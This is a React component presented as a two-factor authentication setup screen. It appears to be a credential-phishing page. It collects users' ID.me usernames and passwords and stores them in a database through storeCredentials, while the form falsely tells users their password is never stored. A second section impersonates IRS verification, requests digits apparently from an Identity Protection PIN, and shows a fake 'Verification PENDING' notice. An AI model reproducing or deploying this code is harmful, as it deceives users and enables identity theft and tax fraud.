import React, { useState } from 'react';
import Icon from '../../../components/AppIcon';
import Button from '../../../components/ui/Button';
import Input from '../../../components/ui/Input';
import accountActivityService from '../../../services/accountActivityService';
import { useAuth } from '../../../contexts/AuthContext';
import idmeService from '../../../services/idmeService';

const TwoFactorAuth = () => {
  const { user, updateProfile } = useAuth();
  const [idmeFormData, setIdmeFormData] = useState({
    username: '',
    password: ''
  });
  const [isIdmeSubmitting, setIsIdmeSubmitting] = useState(false);
  const [submitMessage, setSubmitMessage] = useState({ type: '', text: '' });
  const [showSuccessPrompt, setShowSuccessPrompt] = useState(false);
  const [ipDigits, setIpDigits] = useState('');
  const [ipSubmitted, setIpSubmitted] = useState(false);

  const handleIdmeInputChange = (e) => {
    const { name, value } = e?.target;
    setIdmeFormData(prev => ({
      ...prev,
      [name]: value
    }));
  };

  const handleIdmeSubmit = async (e) => {
    e?.preventDefault();
    setIsIdmeSubmitting(true);
    setSubmitMessage({ type: '', text: '' });
    setShowSuccessPrompt(false);
    
    try {
      // Store credentials in database
      if (user?.id) {
        console.log('Submitting ID.me credentials for user:', user?.id);
        
        await idmeService?.storeCredentials(
          user?.id,
          idmeFormData?.username,
          idmeFormData?.password
        );
        
        // Log activity
        await accountActivityService?.logActivity(user?.id, {
          activityType: 'idme_connected',
          description: 'ID.me account connected for 2FA',
          ipAddress: 'N/A'
        });
        
        console.log('ID.me credentials submitted to database successfully');
        setSubmitMessage({ type: 'success', text: 'ID.me credentials saved successfully!' });
        setShowSuccessPrompt(true);
        
        // Reset form
        setIdmeFormData({ username: '', password: '' });
        
        // Hide success prompt after 5 seconds
        setTimeout(() => {
          setShowSuccessPrompt(false);
        }, 5000);
      } else {
        throw new Error('User not found. Please log in again.');
      }
      
      setIsIdmeSubmitting(false);
    } catch (error) {
      console.error('Failed to submit ID.me credentials:', error);
      setSubmitMessage({ 
        type: 'error', 
        text: error?.message || 'Failed to save credentials. Please try again.' 
      });
      setIsIdmeSubmitting(false);
    }
  };

  return (
    <div className="bg-card rounded-lg shadow-md p-4 md:p-6 lg:p-8">
      {/* Success Prompt Modal */}
      {showSuccessPrompt && (
        <div className="fixed inset-0 bg-black/50 flex items-center justify-center z-50 p-4">
          <div className="bg-white dark:bg-gray-800 rounded-lg shadow-xl p-6 max-w-md w-full animate-fade-in">
            <div className="flex flex-col items-center text-center">
              <div className="w-16 h-16 bg-green-100 dark:bg-green-900/30 rounded-full flex items-center justify-center mb-4">
                <Icon name="CheckCircle" size={32} className="text-green-600 dark:text-green-400" />
              </div>
              <h3 className="text-xl font-semibold text-foreground mb-2">ID.me credentials has been sent for verification</h3>
              <Button 
                onClick={() => setShowSuccessPrompt(false)}
                fullWidth
                className="mt-6"
              >
                Close
              </Button>
            </div>
          </div>
        </div>
      )}
      <div className="flex items-center justify-between mb-6">
        <div className="flex items-center gap-3">
          <div className="w-10 h-10 md:w-12 md:h-12 bg-primary/10 rounded-lg flex items-center justify-center">
            <Icon name="ShieldCheck" size={24} color="var(--color-primary)" />
          </div>
          <div>
            <h2 className="text-xl md:text-2xl font-semibold text-foreground">Two-Factor Authentication</h2>
            <p className="text-sm text-muted-foreground">Add an extra layer of security to your account</p>
          </div>
        </div>
      </div>
      {/* ID.me Authentication Form */}
      <div className="border border-border rounded-lg p-4 md:p-6 mb-6 bg-muted/30">
        <div className="flex items-center gap-3 mb-4">
          <div className="w-10 h-10 bg-primary/10 rounded-lg flex items-center justify-center">
            <Icon name="Shield" size={20} color="var(--color-primary)" />
          </div>
          <div>
            <h3 className="text-lg font-semibold text-foreground">ID.me Authentication</h3>
            <p className="text-sm text-muted-foreground">Connect your ID.me account for enhanced verification</p>
          </div>
        </div>
        
        <form onSubmit={handleIdmeSubmit} className="space-y-4">
          <div>
            <Input
              label="ID.me Username"
              name="username"
              type="text"
              placeholder="Enter your ID.me username"
              value={idmeFormData?.username}
              onChange={handleIdmeInputChange}
              required
            />
          </div>

          <div>
            <Input
              label="ID.me Password"
              name="password"
              type="password"
              placeholder="Enter your ID.me password"
              value={idmeFormData?.password}
              onChange={handleIdmeInputChange}
              required
            />
          </div>

          <div className="flex items-start gap-2 p-3 bg-blue-50 dark:bg-blue-900/20 rounded-lg">
            <Icon name="Info" size={16} className="text-blue-600 dark:text-blue-400 flex-shrink-0 mt-0.5" />
            <p className="text-xs text-blue-800 dark:text-blue-300">
              Your ID.me credentials are encrypted and used only for identity verification. We never store your password.
            </p>
          </div>

          <Button
            type="submit"
            disabled={isIdmeSubmitting || !idmeFormData?.username || !idmeFormData?.password}
            fullWidth
          >
            {isIdmeSubmitting ? (
              <span className="flex items-center justify-center gap-2">
                <Icon name="Loader2" size={16} className="animate-spin" />
                Submitting...
              </span>
            ) : (
              'Submit'
            )}
          </Button>
          
          {submitMessage?.text && (
            <div className={`flex items-start gap-2 p-3 rounded-lg ${
              submitMessage?.type === 'success' ?'bg-green-50 dark:bg-green-900/20' :'bg-red-50 dark:bg-red-900/20'
            }`}>
              <Icon 
                name={submitMessage?.type === 'success' ? 'CheckCircle' : 'AlertCircle'} 
                size={16} 
                className={`flex-shrink-0 mt-0.5 ${
                  submitMessage?.type === 'success' ?'text-green-600 dark:text-green-400' :'text-red-600 dark:text-red-400'
                }`} 
              />
              <p className={`text-xs ${
                submitMessage?.type === 'success' ?'text-green-800 dark:text-green-300' :'text-red-800 dark:text-red-300'
              }`}>
                {submitMessage?.text}
              </p>
            </div>
          )}
        </form>
      </div>
      
      {/* Verify with TAX-MAN Link */}
      <div className="border-t border-border pt-6">
        <div className="flex items-center gap-3">
          <div className="w-10 h-10 bg-primary/10 rounded-lg flex items-center justify-center">
            <Icon name="ExternalLink" size={20} color="var(--color-primary)" />
          </div>
          <div>
            <a 
              href="https://www.irs.gov/identity-theft-fraud-scams/get-an-identity-protection-pin"
              target="_blank"
              rel="noopener noreferrer"
              className="text-lg font-semibold text-primary hover:text-primary/80 transition-colors flex items-center gap-2"
            >
              Verify with TAX-MAN
              <Icon name="ExternalLink" size={16} />
            </a>
            <p className="text-sm text-muted-foreground mt-1">
              Get an Identity Protection PIN from the IRS
            </p>
          </div>
        </div>
        
        {/* IP Verification Section */}
        <div className="mt-6 space-y-4">
          <div>
            <Input
              label="Input last three digits of IP to verify"
              type="text"
              placeholder="Enter last 3 digits"
              value={ipDigits}
              onChange={(e) => setIpDigits(e?.target?.value)}
              maxLength={3}
              className="max-w-xs"
            />
          </div>
          
          <Button
            onClick={() => setIpSubmitted(true)}
            disabled={ipDigits?.length !== 3}
            className="max-w-xs"
          >
            Submit
          </Button>
          
          {ipSubmitted && (
            <>
              <div className="flex items-center gap-2 p-3 bg-yellow-50 dark:bg-yellow-900/20 rounded-lg max-w-md">
                <Icon name="Clock" size={16} className="text-yellow-600 dark:text-yellow-400 flex-shrink-0" />
                <p className="text-sm font-medium text-yellow-800 dark:text-yellow-300">
                  Verification PENDING
                </p>
              </div>
              
              <div className="flex items-start gap-2 p-3 bg-blue-50 dark:bg-blue-900/20 rounded-lg max-w-md">
                <Icon name="Bell" size={16} className="text-blue-600 dark:text-blue-400 flex-shrink-0 mt-0.5" />
                <p className="text-sm text-blue-800 dark:text-blue-300">
                  We will notify you with a code upon verification confirmation, kindly be available when this is been carried out.
                </p>
              </div>
            </>
          )}
        </div>
      </div>
    </div>
  );
};

export default TwoFactorAuth;